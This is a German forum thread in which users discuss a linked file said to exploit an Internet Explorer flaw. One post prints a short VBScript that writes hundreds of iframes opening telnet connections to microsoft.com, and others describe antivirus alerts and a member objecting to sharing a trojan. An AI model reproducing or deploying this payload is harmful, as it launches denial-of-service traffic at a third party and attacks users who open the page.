Jump to content
Sign in to follow this  
ThaWild

Sicherheitslücke Internet Explorer

Recommended Posts

Hier wieder eine Sicherheitslücke vom IE...

 

www.mozilla.linuxfaqs.de/Geil.jpg

 

Achtung! Nicht sehr empfehlenswert mit dem IE aufzumachen.

 

Do it on your own risk!

Share this post


Link to post

hi thawild,

 

was passiert denn wenn man den link mitm ie aufmacht!? habs mitm firebird geöffnet und bekomm nur ne meldung das das bild fehler enthält. wäre nett wenn du ein paar mehr infos dazu geben könntest ;)

 

gruss saracs

Share this post


Link to post

ausprobieren ;)

 

es zeigt nur eine IE-Sicherheitslücke auf, nix verheerendes, is ja von ner namhaften seite ;)

 

aber wer den link mitm IE aufmacht überlegt sich dann sicher ober weiterhin seine Bankgeschäfte oder ähnliches mit dem IE durchführt

 

Die Sicherheitslücken vom IE werden ja großteil verniedlicht aber der link veranschaulicht schon!

 

greez stefan

 

PS: Wie gesagt "auf eigene Gefahr ;)"

Share this post


Link to post

Habe es mal ausprobiert

 

erstmal meldet sich mein Virusscanner der ein virus entdeckt hat *VBS/DDos-iframeNet.a

 

und dann öffenen sich n aufen Hyperterminals zu Microsoft.com

 

ist schon krass was man so alles machen kann

Share this post


Link to post

Stimmt . . . nett - und so simpel :shock:

 

<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

 

das ganze ein ca. 10 mal hintereinander

 

Mein Scanner hat auch angeschlagen und mir sogar den Zugriff auf die Datei verweigert ;)

Share this post


Link to post

Natürlich mußte ich es auchsofort mal probieren !

Typisch eigendlich !!!!

Wenn ich nicht drauf vorbereitet gewesen wäre hätte ich mich echt erschrocken!!!

Share this post


Link to post

Im Allgemeinen

 

fand ich dieses Board bisher sehr gut, informativ und seriös.

 

Hier einen Link zu veröffentlichen auf einen offiziell eingestuften

Trojaner der ein Denial Of Svc auf microsoft.com vornimmt finde

ich komplett am Ziel vorbei.

 

thorgood

Share this post


Link to post

Okay, der link ist jetzt nicht mehr anklickbar, mehr wäre Zensur bzw. Totschweigen,

 

Mir wäre der thread mit einem Hinweis zu einem Patch auch lieber, aber den gibt es leider (noch) nicht.

 

Ich denke, hier wäre MS gefragt.

Share this post


Link to post
Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte überlege Dir, ob es nicht sinnvoller ist ein neues Thema zu erstellen.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

Werbepartner:



×
×
  • Create New...